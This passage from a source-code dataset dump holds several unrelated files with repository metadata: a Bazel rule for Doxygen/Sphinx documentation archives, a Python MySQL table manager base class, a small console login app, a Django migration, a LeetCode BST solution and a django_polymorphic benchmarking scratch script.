return etree.tostring(tree) | 31.971429 | 93 | 0.669348 | 157 | 1,119 | 4.598726 | 0.566879 | 0.062327 | 0.049862 | 0.049862 | 0.066482 | 0.066482 | 0 | 0 | 0 | 0 | 0 | 0.007786 | 0.196604 | 1,119 | 35 | 94 | 31.971429 | 0.795328 | 0.366399 | 0 | 0 | 0 | 0 | 0.052857 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.142857 | false | 0 | 0.285714 | 0 | 0.52381 | 0.095238 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
62ad2faaa4417f27b1e2dd75edf9e858d937f1c1 | 5,786 | bzl | Python | docs.bzl | es-ude/EmbeddedSystemsBuildScripts | 276c3ca78ba8285cd26c3c10443d89ccc403a69c | [
"MIT"
] | 3 | 2019-06-26T14:08:12.000Z | 2020-03-10T06:24:46.000Z | docs.bzl | es-ude/EmbeddedSystemsBuildScripts | 276c3ca78ba8285cd26c3c10443d89ccc403a69c | [
"MIT"
] | 31 | 2019-06-10T10:50:58.000Z | 2021-08-06T13:43:54.000Z | docs.bzl | es-uni-due/EmbeddedSystemsBuildScripts | 276c3ca78ba8285cd26c3c10443d89ccc403a69c | [
"MIT"
] | 5 | 2019-07-08T23:33:39.000Z | 2020-10-11T20:35:25.000Z | def _doxygen_archive_impl(ctx):
"""Generate a .tar.gz archive containing documentation using Doxygen.
Args:
name: label for the generated rule. The archive will be "%{name}.tar.gz".
doxyfile: configuration file for Doxygen, @@OUTPUT_DIRECTORY@@ will be replaced with the actual output dir
srcs: source files the documentation will be generated from.
"""
doxyfile = ctx.file.doxyfile
out_file = ctx.outputs.out
out_dir_path = out_file.short_path[:-len(".tar.gz")]
commands = [
"mkdir -p %s" % out_dir_path,
"out_dir_path=$(cd %s; pwd)" % out_dir_path,
"pushd %s" % doxyfile.dirname,
"""sed -e \"s:@@OUTPUT_DIRECTORY@@:$out_dir_path/:\" <%s | doxygen -""" % doxyfile.basename,
"popd",
"tar czf %s -C %s ./" % (out_file.path, out_dir_path),
]
ctx.actions.run_shell(
inputs = ctx.files.srcs + [doxyfile],
outputs = [out_file],
use_default_shell_env = True,
command = " && ".join(commands),
)
doxygen_archive = rule(
implementation = _doxygen_archive_impl,
attrs = {
"doxyfile": attr.label(
mandatory = True,
allow_single_file = True,
),
"srcs": attr.label_list(
mandatory = True,
allow_files = True,
),
},
outputs = {
"out": "%{name}.tar.gz",
},
)
def _sphinx_archive_impl(ctx):
"""
Generates a sphinx documentation archive (.tar.gz).
The output is called <name>.tar.gz, where <name> is the
name of the rule.
Args:
config_file: sphinx conf.py file
doxygen_xml_archive: an archive that containing the generated doxygen
xml files to be consumed by the breathe sphinx plugin.
Setting this attribute automatically enables the breathe plugin
srcs: the *.rst files to consume
"""
out_file = ctx.outputs.sphinx
out_dir_path = out_file.short_path[:-len(".tar.gz")]
commands = ["mkdir _static"]
inputs = ctx.files.srcs
if ctx.attr.doxygen_xml_archive != None:
commands = commands + [
"mkdir xml",
"tar -xzf {xml} -C xml --strip-components=2".format(xml = ctx.file.doxygen_xml_archive.path),
]
inputs.append(ctx.file.doxygen_xml_archive)
commands = commands + [
"sphinx-build -M build ./ _build -q -b html -C {settings}".format(
settings = _sphinx_settings(ctx),
out_dir = out_dir_path,
),
]
commands = commands + [
"tar czf %s -C _build/build/ ./" % (out_file.path),
]
ctx.actions.run_shell(
use_default_shell_env = True,
outputs = [out_file],
inputs = inputs,
command = " && ".join(commands),
)
sphinx_archive = rule(
implementation = _sphinx_archive_impl,
attrs = {
"srcs": attr.label_list(
mandatory = True,
allow_files = True,
),
"doxygen_xml_archive": attr.label(
default = None,
allow_single_file = True,
),
"master_doc": attr.string(default = "contents"),
"version": attr.string(
mandatory = True,
),
"project": attr.string(
default = "",
),
"copyright": attr.string(default = ""),
"extensions": attr.string_list(default = [
"sphinx.ext.intersphinx",
"sphinx.ext.todo",
]),
"templates": attr.string_list(default = []),
"source_suffix": attr.string_list(default = [".rst"]),
"exclude_patterns": attr.string_list(default = ["_build", "Thumbs.db", ".DS_Store"]),
"pygments_style": attr.string(default = ""),
"language": attr.string(default = ""),
"html_theme": attr.string(default = "sphinx_rtd_theme"),
"html_theme_options": attr.string_dict(default = {}),
"html_static_path": attr.string_list(default = ["_static"]),
"html_sidebars": attr.string_dict(default = {}),
"intersphinx_mapping": attr.string_dict(default = {}),
},
outputs = {
"sphinx": "%{name}.tar.gz",
},
)
def add_option(settings, setting, value):
if value != None or len(value) == 0:
settings = settings + ["-D {setting}={value}".format(setting = setting, value = value.replace(" ", "\ "))]
return settings
def _sphinx_settings(ctx):
settings = []
extensions = ctx.attr.extensions
settings = add_option(settings, "version", ctx.attr.version)
if ctx.attr.project == "":
settings = add_option(settings, "project", ctx.workspace_name)
else:
settings = add_option(settings, "project", ctx.attr.project)
if ctx.attr.doxygen_xml_archive != None:
extensions = extensions + ["breathe"]
settings = add_option(settings, "breathe_projects." + ctx.workspace_name, "xml")
settings = add_option(settings, "breathe_default_project", ctx.workspace_name)
settings = add_option(settings, "copyright", ctx.attr.copyright)
settings = add_option(settings, "master_doc", ctx.attr.master_doc)
for extension in extensions:
settings = add_option(settings, "extensions", extension)
for template in ctx.attr.templates:
settings = add_option(settings, "templates", template)
for suffix in ctx.attr.source_suffix:
settings = add_option(settings, "source_suffix", suffix)
for pattern in ctx.attr.exclude_patterns:
settings = add_option(settings, "exclude_patterns", pattern)
settings = add_option(settings, "html_theme", ctx.attr.html_theme)
for path in ctx.attr.html_static_path:
settings = add_option(settings, "html_static_path", path)
setting_string = " ".join(settings)
return setting_string | 37.816993 | 114 | 0.610093 | 665 | 5,786 | 5.102256 | 0.228571 | 0.044209 | 0.070144 | 0.095785 | 0.188624 | 0.091954 | 0.071323 | 0.05364 | 0.05364 | 0.027704 | 0 | 0.000467 | 0.259419 | 5,786 | 153 | 115 | 37.816993 | 0.791365 | 0.128241 | 0 | 0.27907 | 1 | 0 | 0.158163 | 0.009184 | 0 | 0 | 0 | 0 | 0 | 1 | 0.031008 | false | 0 | 0 | 0 | 0.046512 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
62b63fa1744965ed736f83868f1e02cf4c32335f | 16,566 | py | Python | szndaogen/data_access/manager_base.py | seznam/szndaogen | e33436893d9d933bee81c0cfb9a0ca4ce4d261b5 | [
"MIT"
] | 3 | 2021-07-20T14:10:22.000Z | 2022-03-21T10:28:15.000Z | szndaogen/data_access/manager_base.py | seznam/szndaogen | e33436893d9d933bee81c0cfb9a0ca4ce4d261b5 | [
"MIT"
] | null | null | null | szndaogen/data_access/manager_base.py | seznam/szndaogen | e33436893d9d933bee81c0cfb9a0ca4ce4d261b5 | [
"MIT"
] | null | null | null | import typing
from ..tools.log import Logger
from .db import DBI
from .model_base import ModelBase
from ..config import Config
class ManagerException(BaseException):
pass
class ViewManagerBase:
MODEL_CLASS = ModelBase
def __init__(self, dbi: DBI = None):
"""
Init function of base model manager class
:param dbi: Instance of database connector. If empty it will be created automatically. Instance of DBI is usualy used with combination of transaction wrapper @DBI.transaction("dbi")
"""
self.dbi = DBI() if dbi is None else dbi
self.bulk_insert_buffer_size = 50
self.bulk_insert_sql_statement = ""
self.bulk_insert_values_buffer = []
@classmethod
def create_model_instance(cls, init_data: dict = None) -> ModelBase:
if init_data is None:
init_data = {}
return cls.MODEL_CLASS(init_data)
def select_one(
self,
*args,
condition: str = "1",
condition_params: typing.Tuple = (),
projection: typing.Tuple = (),
order_by: typing.Tuple = (),
) -> ModelBase:
"""
Select one row from DB table or View
:param projection: sql projection - default *
:param args: Primary keys or condition and condition_params if there are no primary keys
:param condition: SQL Condition (Will be used if there are no positional args from primary keys)
:param condition_params: Positional params for SQL condition
(Will be used if there are no positional args from primary keys)
:param order_by: Params for SQL order by statement
"""
base_condition = self.MODEL_CLASS.Meta.SQL_STATEMENT_WHERE_BASE
if args:
condition = self._prepare_primary_sql_condition()
condition_params = args
projection_statement = ", ".join(projection) if projection else "*"
order_by_sql_format = ", ".join(order_by)
limit = 1
if base_condition == "1":
where_statement = f"WHERE ({condition})" if condition else ""
else:
where_statement = f"WHERE {base_condition} AND ({condition})" if condition else f"WHERE {base_condition}"
order_by_statement = f"ORDER BY {order_by_sql_format}" if order_by else ""
limit_statement = f"LIMIT {limit}" if limit else ""
sql = self.MODEL_CLASS.Meta.SQL_STATEMENT.format(
PROJECTION=projection_statement,
WHERE=where_statement,
ORDER_BY=order_by_statement,
LIMIT=limit_statement,
OFFSET="",
)
Logger.log.info("ViewManagerBase.select_one.sql", manager=self.__class__.__name__)
result = self.dbi.fetch_one(sql, condition_params)
Logger.log.info("ViewManagerBase.select_one.result", result=result, manager=self.__class__.__name__)
if Config.MANAGER_AUTO_MAP_MODEL_ATTRIBUTES:
return self.MODEL_CLASS(result).map_model_attributes() if result else None
return self.MODEL_CLASS(result) if result else None
def select_all(
self,
condition: str = "1",
condition_params: typing.Tuple = (),
projection: typing.Tuple = (),
order_by: typing.Tuple = (),
limit: int = 0,
offset: int = 0,
) -> typing.List[ModelBase]:
"""
Select all rows matching the condition
:param offset: SQL offset
:param projection: sql projection - default *
:param condition: SQL condition
:param condition_params: Positional params for SQL condition
:param order_by: Params for SQL order by statement
:param limit: Params for SQL limit statement
"""
base_condition = self.MODEL_CLASS.Meta.SQL_STATEMENT_WHERE_BASE
projection_statement = ", ".join(projection) if projection else "*"
if base_condition == "1":
where_statement = f"WHERE ({condition})" if condition else ""
else:
where_statement = f"WHERE {base_condition} AND ({condition})" if condition else f"WHERE {base_condition}"
order_by_sql_format = ", ".join(order_by)
if len(order_by) > 0:
order_by_statement = f"ORDER BY {order_by_sql_format}"
else:
if self.MODEL_CLASS.Meta.SQL_STATEMENT_ORDER_BY_DEFAULT:
order_by_statement = f"ORDER BY {self.MODEL_CLASS.Meta.SQL_STATEMENT_ORDER_BY_DEFAULT}"
else:
order_by_statement = ""
limit_statement = f"LIMIT {limit}" if limit else ""
offset_statement = f"OFFSET {offset}" if offset else ""
sql = self.MODEL_CLASS.Meta.SQL_STATEMENT.format(
PROJECTION=projection_statement,
WHERE=where_statement,
ORDER_BY=order_by_statement,
LIMIT=limit_statement,
OFFSET=offset_statement,
)
Logger.log.info("ViewManagerBase.select_all.sql", manager=self.__class__.__name__)
results = self.dbi.fetch_all(sql, condition_params)
Logger.log.info("ViewManagerBase.select_all.result", result=results, manager=self.__class__.__name__)
if Config.MANAGER_AUTO_MAP_MODEL_ATTRIBUTES:
Logger.log.debug("ViewManagerBase.select_all.result.list.automapped")
return [self.MODEL_CLASS(result).map_model_attributes() for result in results]
Logger.log.debug("ViewManagerBase.select_all.result.list")
return [self.MODEL_CLASS(result) for result in results]
@staticmethod
def models_into_dicts(result: typing.List[ModelBase]) -> typing.List[typing.Dict]:
"""
Convert result of select_all into list of dicts
:param result: List of models
"""
return [item.to_dict() for item in result]
@classmethod
def _prepare_primary_sql_condition(cls):
args = ["{} = %s".format(primary_key) for primary_key in cls.MODEL_CLASS.Meta.PRIMARY_KEYS]
return " AND ".join(args)
@classmethod
def _prepare_primary_sql_condition_params(cls, model_instance: ModelBase):
return [model_instance.__getattribute__(attribute_name) for attribute_name in cls.MODEL_CLASS.Meta.PRIMARY_KEYS]
class TableManagerBase(ViewManagerBase):
def update_one(self, model_instance: ModelBase, exclude_none_values: bool = False, exclude_columns: list = None) -> int:
"""
Update one database record based on model attributes
:param model_instance: Model instance
:param exclude_none_values: You can exclude columns with None value from update statement
:param exclude_columns: You can exclude columns names from update statement
:return: Number of affected rows
"""
exclude_columns = exclude_columns or []
if not self.MODEL_CLASS.Meta.PRIMARY_KEYS:
raise ManagerException("Can't update record based on model instance. There are no primary keys specified.")
set_prepare = []
set_prepare_params = []
for attribute_name in self.MODEL_CLASS.Meta.ATTRIBUTE_LIST:
value = model_instance.__getattribute__(attribute_name)
if (exclude_none_values and value is None) or attribute_name in exclude_columns:
continue
set_prepare.append("`{}` = %s".format(attribute_name))
set_prepare_params.append(value)
condition_prepare = self._prepare_primary_sql_condition()
condition_prepare_params = self._prepare_primary_sql_condition_params(model_instance)
sql = "UPDATE `{}` SET {} WHERE {} LIMIT 1".format(
self.MODEL_CLASS.Meta.TABLE_NAME, ", ".join(set_prepare), condition_prepare
)
Logger.log.info("TableManagerBase.update_one.sql", manager=self.__class__.__name__)
result = self.dbi.execute(sql, set_prepare_params + condition_prepare_params)
Logger.log.info("TableManagerBase.update_one.result", result=result, manager=self.__class__.__name__)
return result
def insert_one(
self,
model_instance: ModelBase,
exclude_none_values: bool = False,
exclude_columns: list = None,
use_on_duplicate_update_statement: bool = False,
use_insert_ignore_statement: bool = False,
) -> int:
"""
Insert one record into database based on model attributes
:param model_instance: Model instance
:param exclude_none_values: You can exclude columns with None value from insert statement
:param exclude_columns: You can exclude columns names from insert statement
:param use_on_duplicate_update_statement: Use ON DUPLICATE KEY UPDATE statement
:param use_insert_ignore_statement: Use INSERT IGNORE statement
:return: Last inserted id if it is possible
"""
exclude_columns = exclude_columns or []
insert_prepare = []
insert_prepare_values = []
insert_prepare_params = []
update_prepare = []
for attribute_name in self.MODEL_CLASS.Meta.ATTRIBUTE_LIST:
value = model_instance.__getattribute__(attribute_name)
if (exclude_none_values and value is None) or attribute_name in exclude_columns:
continue
insert_prepare.append("`{}`".format(attribute_name))
insert_prepare_values.append("%s")
insert_prepare_params.append(value)
if use_on_duplicate_update_statement:
update_prepare.append("`{0}` = VALUES(`{0}`)".format(attribute_name))
if use_on_duplicate_update_statement:
sql = "INSERT INTO `{}` ({}) VALUES ({}) ON DUPLICATE KEY UPDATE {}".format(
self.MODEL_CLASS.Meta.TABLE_NAME,
", ".join(insert_prepare),
", ".join(insert_prepare_values),
", ".join(update_prepare),
)
elif use_insert_ignore_statement:
sql = "INSERT IGNORE INTO `{}` ({}) VALUES ({})".format(
self.MODEL_CLASS.Meta.TABLE_NAME, ", ".join(insert_prepare), ", ".join(insert_prepare_values)
)
else:
sql = "INSERT INTO `{}` ({}) VALUES ({})".format(
self.MODEL_CLASS.Meta.TABLE_NAME, ", ".join(insert_prepare), ", ".join(insert_prepare_values)
)
Logger.log.info("TableManagerBase.insert_one.sql", manager=self.__class__.__name__)
result = self.dbi.execute(sql, insert_prepare_params)
# set primary key value
if (
result
and len(self.MODEL_CLASS.Meta.PRIMARY_KEYS) == 1
and self.MODEL_CLASS.Meta.ATTRIBUTE_TYPES[self.MODEL_CLASS.Meta.PRIMARY_KEYS[0]] == int
):
model_instance.__setattr__(self.MODEL_CLASS.Meta.PRIMARY_KEYS[0], result)
Logger.log.info("TableManagerBase.insert_one.result", result=result, manager=self.__class__.__name__)
return result
def insert_one_bulk(
self,
model_instance: ModelBase,
exclude_none_values: bool = False,
exclude_columns: list = None,
use_on_duplicate_update_statement: bool = False,
use_insert_ignore_statement: bool = False,
auto_flush: bool = True,
) -> int:
"""
Insert more records in one bulk.
:param model_instance: Model instance
:param exclude_none_values: You can exclude columns with None value from insert statement
:param exclude_columns: You can exclude columns names from insert statement
:param use_on_duplicate_update_statement: Use ON DUPLICATE KEY UPDATE statement
:param use_insert_ignore_statement: Use INSERT IGNORE statement
:param auto_flush: Auto flush bulks from buffer after N records (defined in self.bulk_insert_buffer_size)
:return: Number of items in buffer
"""
exclude_columns = exclude_columns or []
insert_prepare = []
insert_prepare_values = []
insert_prepare_params = []
update_prepare = []
for attribute_name in self.MODEL_CLASS.Meta.ATTRIBUTE_LIST:
value = model_instance.__getattribute__(attribute_name)
if (exclude_none_values and value is None) or attribute_name in exclude_columns:
continue
insert_prepare.append("`{}`".format(attribute_name))
insert_prepare_values.append("%s")
insert_prepare_params.append(value)
if use_on_duplicate_update_statement:
update_prepare.append("`{0}` = VALUES(`{0}`)".format(attribute_name))
if not self.bulk_insert_sql_statement:
if use_on_duplicate_update_statement:
self.bulk_insert_sql_statement = "INSERT INTO `{}` ({}) VALUES ({}) ON DUPLICATE KEY UPDATE {}".format(
self.MODEL_CLASS.Meta.TABLE_NAME,
", ".join(insert_prepare),
", ".join(insert_prepare_values),
", ".join(update_prepare),
)
elif use_insert_ignore_statement:
self.bulk_insert_sql_statement = "INSERT IGNORE INTO `{}` ({}) VALUES ({})".format(
self.MODEL_CLASS.Meta.TABLE_NAME, ", ".join(insert_prepare), ", ".join(insert_prepare_values)
)
else:
self.bulk_insert_sql_statement = "INSERT INTO `{}` ({}) VALUES ({})".format(
self.MODEL_CLASS.Meta.TABLE_NAME, ", ".join(insert_prepare), ", ".join(insert_prepare_values)
)
self.bulk_insert_values_buffer.append(insert_prepare_params)
buffer_len = len(self.bulk_insert_values_buffer)
if auto_flush and buffer_len >= self.bulk_insert_buffer_size:
self.insert_bulk_flush()
return buffer_len
def insert_bulk_flush(self) -> int:
"""
Flush prepared inserts from buffer
:return: Number of inserted rows
"""
result = None
if self.bulk_insert_values_buffer:
result = self.dbi.execute_many(self.bulk_insert_sql_statement, self.bulk_insert_values_buffer)
Logger.log.info(
"TableManagerBase.insert_one_bulk_flush.result",
result=result,
inserted_count=len(self.bulk_insert_values_buffer),
manager=self.__class__.__name__,
)
self.bulk_insert_sql_statement = ""
self.bulk_insert_values_buffer = []
return result
def delete_one(self, model_instance: ModelBase) -> int:
"""
Delete one row matching primary key condition.
:param model_instance: Instance of model
:return: Number of affected rows
"""
condition_prepare = self._prepare_primary_sql_condition()
condition_prepare_params = self._prepare_primary_sql_condition_params(model_instance)
sql_statement = "DELETE FROM `{}` WHERE {} LIMIT 1"
sql = sql_statement.format(self.MODEL_CLASS.Meta.TABLE_NAME, condition_prepare)
Logger.log.info("TableManagerBase.delete_one.sql", manager=self.__class__.__name__)
result = self.dbi.execute(sql, condition_prepare_params)
Logger.log.info(f"TableManagerBase.delete_one.result", result=result, manager=self.__class__.__name__)
return result
def delete_all(
self, condition: str, condition_params: typing.Tuple = (), order_by: typing.Tuple = (), limit: int = 0
) -> int:
"""
Delete all table rows matching condition.
:param condition: SQL condition statement
:param condition_params: SQL condition position params
:param order_by: SQL order statement
:param limit: SQL limit statement
:return: Number of affected rows
"""
where_statement = f"WHERE {condition}"
order_by_sql_format = ", ".join(order_by)
order_by_statement = f"ORDER BY {order_by_sql_format}" if order_by else ""
limit_statement = f"LIMIT {limit}" if limit else ""
sql_statement = "DELETE FROM `{TABLE}` {WHERE} {ORDER_BY} {LIMIT}"
sql = sql_statement.format(
TABLE=self.MODEL_CLASS.Meta.TABLE_NAME,
WHERE=where_statement,
ORDER_BY=order_by_statement,
LIMIT=limit_statement,
)
Logger.log.info("TableManagerBase.delete_all.sql", manager=self.__class__.__name__)
result = self.dbi.execute(sql, condition_params)
Logger.log.info("TableManagerBase.delete_all.result", result=result, manager=self.__class__.__name__)
return result
| 41.72796 | 189 | 0.651093 | 1,934 | 16,566 | 5.258014 | 0.08635 | 0.026158 | 0.037172 | 0.040712 | 0.744321 | 0.702429 | 0.608713 | 0.577933 | 0.521389 | 0.49287 | 0 | 0.001631 | 0.259628 | 16,566 | 396 | 190 | 41.833333 | 0.827477 | 0.167089 | 0 | 0.503906 | 0 | 0 | 0.112335 | 0.047906 | 0 | 0 | 0 | 0 | 0 | 1 | 0.050781 | false | 0.003906 | 0.019531 | 0.003906 | 0.140625 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
62b99b8da2aecb88766819c7135ff9c55eef6434 | 1,808 | py | Python | src/users/actions.py | josue0ghost/Python-and-MySQL-console-application | c82641c5ccaae3eb526decd2c96baa4457613a2a | [
"MIT"
] | null | null | null | src/users/actions.py | josue0ghost/Python-and-MySQL-console-application | c82641c5ccaae3eb526decd2c96baa4457613a2a | [
"MIT"
] | null | null | null | src/users/actions.py | josue0ghost/Python-and-MySQL-console-application | c82641c5ccaae3eb526decd2c96baa4457613a2a | [
"MIT"
] | null | null | null | import users.user as user
import grades.actions as grade
class Actions:
def signup(self):
print("Selected item: signup")
name = input("Your name: ")
lastname = input("Your last name: ")
email = input("Your email: ")
password = input("Choose a password: ")
newUser = user.User(name, lastname, email, password)
reg = newUser.register()
if reg[0] >= 1:
print(f"{reg[1].name}, you've been registered with email {reg[1].email}")
else:
print("Registration failed")
def signin(self):
try:
email = input("Email: ")
password = input("Password: ")
existingUser = user.User('', '', email, password)
login = existingUser.identify()
# id | name | lastname | email | password | date
if email == login[3]:
print(f"Welcome, {login[1]}")
self.mainMenu(login)
except Exception as e:
print(type(e))
print(type(e).__name__)
print("Login failed")
def mainMenu(self, user):
print("""
Available options:
- Create grade (create)
- Show grades (show)
- Delete grade (delete)
- Log out (exit)
""")
action = input("What do you want to do?: ")
gradeActions = grade.Actions()
if action == "create":
gradeActions.create(user)
self.mainMenu(user)
elif action == "show":
gradeActions.show(user)
self.mainMenu(user)
elif action == "delete":
gradeActions.delete(user)
self.mainMenu(user)
elif action == "exit":
exit() | 28.25 | 85 | 0.499447 | 180 | 1,808 | 4.994444 | 0.372222 | 0.072303 | 0.053393 | 0.066741 | 0.100111 | 0.100111 | 0 | 0 | 0 | 0 | 0 | 0.005362 | 0.381084 | 1,808 | 64 | 86 | 28.25 | 0.798034 | 0.025442 | 0 | 0.061224 | 0 | 0.020408 | 0.246451 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.061224 | false | 0.081633 | 0.040816 | 0 | 0.122449 | 0.163265 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
62bafbcb01ba35806246e96f56398067276ef692 | 688 | py | Python | topics/migrations/0001_initial.py | codingforentrepreneurs/Autogenerate-Django-Models- | 95f3ffc2ad6714a02ea16b124ae075dd7ff218c2 | [
"MIT"
] | 28 | 2020-11-08T21:04:00.000Z | 2021-09-29T06:56:11.000Z | topics/migrations/0001_initial.py | codingforentrepreneurs/Autogenerate-Django-Models- | 95f3ffc2ad6714a02ea16b124ae075dd7ff218c2 | [
"MIT"
] | null | null | null | topics/migrations/0001_initial.py | codingforentrepreneurs/Autogenerate-Django-Models- | 95f3ffc2ad6714a02ea16b124ae075dd7ff218c2 | [
"MIT"
] | 9 | 2020-11-11T13:47:32.000Z | 2021-08-24T11:31:53.000Z | # Generated by Django 3.1.3 on 2020-11-08 19:52
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Topics',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('tag', models.CharField(blank=True, max_length=120, null=True)),
('count', models.BigIntegerField(blank=True, null=True)),
('percent', models.DecimalField(blank=True, decimal_places=5, max_digits=10, null=True)),
],
),
]
| 28.666667 | 114 | 0.59157 | 75 | 688 | 5.346667 | 0.68 | 0.067332 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.042169 | 0.276163 | 688 | 23 | 115 | 29.913043 | 0.763052 | 0.065407 | 0 | 0 | 1 | 0 | 0.039002 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.0625 | 0 | 0.3125 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
62be0b337ff4bd9e1d305e934c2a552b0ef05ec1 | 791 | py | Python | 783-minimum-distance-between-bst-nodes/783-minimum-distance-between-bst-nodes.py | hyeseonko/LeetCode | 48dfc93f1638e13041d8ce1420517a886abbdc77 | [
"MIT"
] | 2 | 2021-12-05T14:29:06.000Z | 2022-01-01T05:46:13.000Z | 783-minimum-distance-between-bst-nodes/783-minimum-distance-between-bst-nodes.py | hyeseonko/LeetCode | 48dfc93f1638e13041d8ce1420517a886abbdc77 | [
"MIT"
] | null | null | null | 783-minimum-distance-between-bst-nodes/783-minimum-distance-between-bst-nodes.py | hyeseonko/LeetCode | 48dfc93f1638e13041d8ce1420517a886abbdc77 | [
"MIT"
] | null | null | null | # Definition for a binary tree node.
# class TreeNode:
# def __init__(self, val=0, left=None, right=None):
# self.val = val
# self.left = left
# self.right = right
class Solution:
def minDiffInBST(self, root: Optional[TreeNode]) -> int:
output=[]
stack=[root]
while(stack):
cur = stack.pop(0)
output.append(cur.val)
if cur.left:
stack.append(cur.left)
if cur.right:
stack.append(cur.right)
sorted_output=sorted(output)
diff = sorted_output[1]-sorted_output[0]
for i in range(2,len(sorted_output)):
if sorted_output[i]-sorted_output[i-1]<diff:
diff=sorted_output[i]-sorted_output[i-1]
return diff | 34.391304 | 60 | 0.558786 | 100 | 791 | 4.3 | 0.37 | 0.251163 | 0.12093 | 0.088372 | 0.125581 | 0.125581 | 0.125581 | 0 | 0 | 0 | 0 | 0.013109 | 0.324905 | 791 | 23 | 61 | 34.391304 | 0.792135 | 0.226296 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.058824 | false | 0 | 0 | 0 | 0.176471 | 0 | 0 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
62bf318fcce84f085eb558f2ffb4dc78820b46cc | 3,399 | py | Python | pexp/management/commands/p2cmd.py | bconstantin/django_polymorphic | 2c47db8fcc284a92d2c9769ba503603fbea92660 | [
"BSD-3-Clause"
] | 27 | 2015-06-24T20:29:20.000Z | 2021-04-18T15:38:15.000Z | pexp/management/commands/p2cmd.py | bconstantin/django_polymorphic | 2c47db8fcc284a92d2c9769ba503603fbea92660 | [
"BSD-3-Clause"
] | 1 | 2015-10-04T14:34:26.000Z | 2015-10-04T14:34:26.000Z | pexp/management/commands/p2cmd.py | bconstantin/django_polymorphic | 2c47db8fcc284a92d2c9769ba503603fbea92660 | [
"BSD-3-Clause"
] | 3 | 2015-11-10T21:36:10.000Z | 2020-06-22T01:51:39.000Z | # -*- coding: utf-8 -*-
"""
This module is a scratchpad for general development, testing & debugging
Well, even more so than pcmd.py. You best ignore p2cmd.py.
"""
import uuid
from django.core.management.base import NoArgsCommand
from django.db.models import connection
from pprint import pprint
import settings
import time,sys
from pexp.models import *
def reset_queries():
connection.queries=[]
def show_queries():
print; print 'QUERIES:',len(connection.queries); pprint(connection.queries); print; connection.queries=[]
def print_timing(func, message='', iterations=1):
def wrapper(*arg):
results=[]
reset_queries()
for i in xrange(iterations):
t1 = time.time()
x = func(*arg)
t2 = time.time()
results.append((t2-t1)*1000.0)
res_sum=0
for r in results: res_sum +=r
median = res_sum / len(results)
print '%s%-19s: %.4f ms, %i queries (%i times)' % (
message,func.func_name,
res_sum,
len(connection.queries),
iterations
)
sys.stdout.flush()
return wrapper
class Command(NoArgsCommand):
help = ""
def handle_noargs(self, **options):
print 'polycmd - sqlite test db is stored in:',settings.SQLITE_DB_PATH
print
if False:
ModelA.objects.all().delete()
a=ModelA.objects.create(field1='A1')
b=ModelB.objects.create(field1='B1', field2='B2')
c=ModelC.objects.create(field1='C1', field2='C2', field3='C3')
reset_queries()
print ModelC.base_objects.all();
show_queries()
if False:
ModelA.objects.all().delete()
for i in xrange(1000):
a=ModelA.objects.create(field1=str(i%100))
b=ModelB.objects.create(field1=str(i%100), field2=str(i%200))
c=ModelC.objects.create(field1=str(i%100), field2=str(i%200), field3=str(i%300))
if i%100==0: print i
f=print_timing(poly_sql_query,iterations=1000)
f()
f=print_timing(poly_sql_query2,iterations=1000)
f()
return
nModelA.objects.all().delete()
a=nModelA.objects.create(field1='A1')
b=nModelB.objects.create(field1='B1', field2='B2')
c=nModelC.objects.create(field1='C1', field2='C2', field3='C3')
qs=ModelA.objects.raw("SELECT * from pexp_modela")
for o in list(qs): print o
from django.db import connection, transaction
from random import Random
rnd=Random()
def poly_sql_query():
cursor = connection.cursor()
cursor.execute("""
SELECT id, pexp_modela.field1, pexp_modelb.field2, pexp_modelc.field3
FROM pexp_modela
LEFT OUTER JOIN pexp_modelb
ON pexp_modela.id = pexp_modelb.modela_ptr_id
LEFT OUTER JOIN pexp_modelc
ON pexp_modelb.modela_ptr_id = pexp_modelc.modelb_ptr_id
WHERE pexp_modela.field1=%i
ORDER BY pexp_modela.id
""" % rnd.randint(0,100) )
#row=cursor.fetchone()
return
def poly_sql_query2():
cursor = connection.cursor()
cursor.execute("""
SELECT id, pexp_modela.field1
FROM pexp_modela
WHERE pexp_modela.field1=%i
ORDER BY pexp_modela.id
